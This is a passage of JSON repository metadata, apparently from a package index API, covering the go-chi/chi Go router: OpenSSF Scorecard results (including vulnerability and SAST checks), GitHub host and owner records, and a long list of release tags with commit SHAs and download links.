project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/